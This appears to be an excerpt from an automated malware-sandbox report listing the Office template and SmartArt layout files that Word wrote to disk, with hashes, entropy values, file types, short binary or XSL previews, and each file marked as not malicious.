                                                      MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                      SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                      SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                      SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):3075
                                                      Entropy (8bit):7.716021191059687
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                      SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                      SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                      SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):252
                                                      Entropy (8bit):3.4680595384446202
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                      SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                      SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                      SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):5783
                                                      Entropy (8bit):7.88616857639663
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8109B3C170E6C2C114164B8947F88AA1
                                                      SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                      SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                      SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):258
                                                      Entropy (8bit):3.4692172273306268
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C1B36A0547FB75445957A619201143AC
                                                      SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                      SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                      SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):7370
                                                      Entropy (8bit):7.9204386289679745
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                      SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                      SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                      SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):246
                                                      Entropy (8bit):3.5039994158393686
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:16711B951E1130126E240A6E4CC2E382
                                                      SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                      SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                      SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):3683
                                                      Entropy (8bit):7.772039166640107
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                      SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                      SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                      SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):16806
                                                      Entropy (8bit):7.9519793977093505
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:950F3AB11CB67CC651082FEBE523AF63
                                                      SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                      SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                      SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):254
                                                      Entropy (8bit):3.4720677950594836
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                      SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                      SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                      SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):286
                                                      Entropy (8bit):3.4670546921349774
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                      SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                      SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                      SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):5630
                                                      Entropy (8bit):7.87271654296772
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                      SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                      SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                      SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):332
                                                      Entropy (8bit):3.4871192480632223
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                      SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                      SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                      SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):254875
                                                      Entropy (8bit):5.003842588822783
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:377B3E355414466F3E3861BCE1844976
                                                      SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                      SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                      SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):286
                                                      Entropy (8bit):3.538396048757031
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:149948E41627BE5DC454558E12AF2DA4
                                                      SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                      SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                      SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):250983
                                                      Entropy (8bit):5.057714239438731
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F883B260A8D67082EA895C14BF56DD56
                                                      SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                      SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                      SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):238
                                                      Entropy (8bit):3.472155835869843
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                      SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                      SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                      SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):5151
                                                      Entropy (8bit):7.859615916913808
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                      SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                      SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                      SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):4026
                                                      Entropy (8bit):7.809492693601857
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                      SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                      SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                      SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                      Malicious:false
                                                      Reputation:unknown
